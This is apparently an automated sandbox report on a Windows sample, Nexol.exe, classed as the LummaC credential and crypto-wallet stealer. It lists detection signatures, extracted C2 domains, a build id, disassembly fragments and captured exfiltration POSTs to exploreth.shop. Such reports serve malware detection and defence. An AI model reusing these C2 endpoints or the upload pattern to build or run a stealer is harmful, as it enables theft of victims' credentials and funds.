Edit tour

Windows Analysis Report
Nexol.exe

Overview

General Information

Sample name:	Nexol.exe
Analysis ID:	1635762
MD5:	0316cd6308d80a13369226b1b4208c64
SHA1:	56c0e860ed64427494bd711be49a7d7ab9b99f5e
SHA256:	b5eddf91c06b738ade13165dfd3fb440e8a0c68b40ec64d000c07156717d5a37
Tags:	exeuser-tmechen_
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Nexol.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\Nexol.exe" MD5: 0316CD6308D80A13369226B1B4208C64)

Nexol.exe (PID: 7876 cmdline: "C:\Users\user\Desktop\Nexol.exe" MD5: 0316CD6308D80A13369226B1B4208C64)

WerFault.exe (PID: 5704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["astralconnec.icu/DPowko", "begindecafer.world/QwdZdf", "garagedrootz.top/oPsoJAN", "modelshiverd.icu/bJhnsj", "arisechairedd.shop/JnsHY", "catterjur.run/boSnzhu", "orangemyther.live/IozZ", "fostinjec.today/LksNAz"], "Build id": "7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000006.00000002.2542777376.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
6.2.Nexol.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
6.2.Nexol.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
5.2.Nexol.exe.38d9550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T23:59:23.858149+0100	2028371	3	Unknown Traffic	192.168.2.4	49717	149.154.167.99	443	TCP
2025-03-11T23:59:26.496449+0100	2028371	3	Unknown Traffic	192.168.2.4	49720	23.210.122.61	443	TCP
2025-03-11T23:59:29.197235+0100	2028371	3	Unknown Traffic	192.168.2.4	49724	104.21.16.1	443	TCP
2025-03-11T23:59:32.499981+0100	2028371	3	Unknown Traffic	192.168.2.4	49729	23.197.127.21	443	TCP
2025-03-11T23:59:41.201516+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.16.1	443	TCP
2025-03-11T23:59:43.890701+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	23.197.127.21	443	TCP
2025-03-11T23:59:46.472729+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.16.1	443	TCP
2025-03-11T23:59:49.177598+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	23.197.127.21	443	TCP
2025-03-11T23:59:52.319331+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.16.1	443	TCP
2025-03-11T23:59:57.282849+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	23.197.127.21	443	TCP
2025-03-11T23:59:59.987390+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.16.1	443	TCP
2025-03-12T00:00:03.067500+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	23.210.122.61	443	TCP
2025-03-12T00:00:05.633046+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.16.1	443	TCP
2025-03-12T00:00:09.581508+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	23.210.122.61	443	TCP
2025-03-12T00:00:12.281349+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T23:59:11.157673+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49711	104.26.12.205	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Nexol.exe

Avira: detected

Antivirus detection for URL or domain

Source: orangemyther.live/IozZ	Avira URL Cloud: Label: malware
Source: modelshiverd.icu/bJhnsj	Avira URL Cloud: Label: malware
Source: astralconnec.icu/DPowko	Avira URL Cloud: Label: malware
Source: catterjur.run/boSnzhu	Avira URL Cloud: Label: malware
Source: fostinjec.today/LksNAz	Avira URL Cloud: Label: malware
Source: begindecafer.world/QwdZdf	Avira URL Cloud: Label: malware
Source: garagedrootz.top/oPsoJAN	Avira URL Cloud: Label: malware
Source: arisechairedd.shop/JnsHY	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["astralconnec.icu/DPowko", "begindecafer.world/QwdZdf", "garagedrootz.top/oPsoJAN", "modelshiverd.icu/bJhnsj", "arisechairedd.shop/JnsHY", "catterjur.run/boSnzhu", "orangemyther.live/IozZ", "fostinjec.today/LksNAz"], "Build id": "7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940"}

Multi AV Scanner detection for submitted file

Source: Nexol.exe	ReversingLabs: Detection: 89%
Source: Nexol.exe	Virustotal: Detection: 76%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.9% probability

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: astralconnec.icu/DPowko
Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: begindecafer.world/QwdZdf
Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: garagedrootz.top/oPsoJAN
Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: modelshiverd.icu/bJhnsj
Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: arisechairedd.shop/JnsHY
Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: catterjur.run/boSnzhu
Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: orangemyther.live/IozZ
Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: fostinjec.today/LksNAz

Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041AF28 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,		6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 6_2_0041AF28 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,		6_2_0041AF28

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: Nexol.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: Nexol.exe
Source:	Binary string: System.Windows.Forms.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: Portals.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WER295A.tmp.dmp.9.dr
Source:	Binary string: System.pdb@\ source: WER295A.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: Nexol.exe
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER295A.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdb source: WER295A.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER295A.tmp.dmp.9.dr

Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov byte ptr [esi], al	6_2_0041203E
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [edx+eax*8], F7D6D3F6h	6_2_0044E0F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [eax], cx	6_2_0041A150
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+eax-536CC802h]	6_2_0041A150
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 53991D4Eh	6_2_0041A150
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	6_2_0041A150
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov byte ptr [esi], cl	6_2_00437177
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+14h]	6_2_00420910
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A566C0CEh	6_2_00420910
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-54C589F0h]	6_2_0042C300
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+000000E0h]	6_2_00410B20
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	6_2_0044CC40
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-54C589F0h]	6_2_00448580
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CF91E6EAh	6_2_0044AF0F
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1E884DE0h]	6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov dword ptr [esp], eax	6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then lea edx, dword ptr [ecx+eax]	6_2_0042FFF0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then jmp edx	6_2_0044C020
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then jmp edx	6_2_0044C039
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then jmp edx	6_2_0044C03B
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov byte ptr [ebx], cl	6_2_004368D3
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h	6_2_004230F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	6_2_0041A090
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov byte ptr [ebx], cl	6_2_00438894
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+02h]	6_2_00429940
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then jmp eax	6_2_0043195C
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	6_2_0041F966
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [ecx], dx	6_2_0041C913
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [edx], ax	6_2_0042E1C4
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	6_2_004019E0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	6_2_0040A1F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	6_2_0040A1F0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2DB8C7A8h]	6_2_00445990
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	6_2_0041D73D
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [ebx+ecx*8], 93A82FD1h	6_2_004489A0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [ecx], ax	6_2_0041D1A8
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov byte ptr [ebx], cl	6_2_004381B5
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edx, byte ptr [ebp-01h]	6_2_00425A50
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx]	6_2_0044CA70
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-000000FAh]	6_2_0044CA70
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+4D85EFEEh]	6_2_00449ACD
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	6_2_00402AD0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	6_2_00433AFC
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then push eax	6_2_0044A2BF
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov byte ptr [ebx], cl	6_2_0040C350
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx]	6_2_0040C350
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+44h]	6_2_00422B78
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp word ptr [esi], 0025h	6_2_00446300
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	6_2_00432318
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [esi], cx	6_2_00432318
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+10h]	6_2_00422322
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	6_2_0044E3C0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [eax], cx	6_2_004293D0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 64A7FFC0h	6_2_0041EC78
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	6_2_0041EC78
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	6_2_0041EC78
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	6_2_0041EC78
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+603A5CCEh]	6_2_00444410
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [ecx], dx	6_2_0041C913
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov dword ptr [esp+08h], ebx	6_2_004334DB
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000002A0h]	6_2_0041BCF3
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2DB8C7A8h]	6_2_00448CF0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2DB8C7A8h]	6_2_00448CF0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov byte ptr [ebx], cl	6_2_00436CAC
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edx, word ptr [edi+ecx]	6_2_00446579
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	6_2_00441D30
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6CFF5A86h]	6_2_00430590
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [ecx], bx	6_2_0042360C
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [ecx], dx	6_2_0042360C
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+01A9AB74h]	6_2_00428E10
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2DB8C7A8h]	6_2_00445620
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	6_2_00432630
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [esi], cx	6_2_00432630
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then push edi	6_2_004126C3
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2DB8C7A8h]	6_2_00445EB0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [ecx], ax	6_2_0041CF45
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_00433F50
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then jmp edx	6_2_0044BF20
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [eax], dx	6_2_00427730
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov esi, eax	6_2_0044A7DC
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1E884DE0h]	6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov dword ptr [esp], eax	6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	6_2_0041AF28
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h	6_2_004487E0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+02h]	6_2_00425FF0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	6_2_00402790
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	6_2_0042EFA0
Source: C:\Users\user\Desktop\Nexol.exe	Code function: 4x nop then mov byte ptr [edi], al	6_2_00438FB0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: astralconnec.icu/DPowko
Source: Malware configuration extractor	URLs: begindecafer.world/QwdZdf
Source: Malware configuration extractor	URLs: garagedrootz.top/oPsoJAN
Source: Malware configuration extractor	URLs: modelshiverd.icu/bJhnsj
Source: Malware configuration extractor	URLs: arisechairedd.shop/JnsHY
Source: Malware configuration extractor	URLs: catterjur.run/boSnzhu
Source: Malware configuration extractor	URLs: orangemyther.live/IozZ
Source: Malware configuration extractor	URLs: fostinjec.today/LksNAz

Source: global traffic	HTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com

Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 23.210.122.61 23.210.122.61
Source: Joe Sandbox View	IP Address: 23.197.127.21 23.197.127.21

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 23.210.122.61:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49720 -> 23.210.122.61:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 23.210.122.61:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 149.154.167.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49711 -> 104.26.12.205:443

Source: global traffic	HTTP traffic detected: POST /gJKDA HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: exploreth.shop
Source: global traffic	HTTP traffic detected: POST /gJKDA HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I6jsBPlEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19585Host: exploreth.shop
Source: global traffic	HTTP traffic detected: POST /gJKDA HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0yX8D6Sh4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8747Host: exploreth.shop
Source: global traffic	HTTP traffic detected: POST /gJKDA HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=wa2U7s7exKFLtjeq5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20440Host: exploreth.shop
Source: global traffic	HTTP traffic detected: POST /gJKDA HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=pPpTBgFqUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2686Host: exploreth.shop
Source: global traffic	HTTP traffic detected: POST /gJKDA HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=tyuvvWlMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583668Host: exploreth.shop
Source: global traffic	HTTP traffic detected: POST /gJKDA HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: exploreth.shop

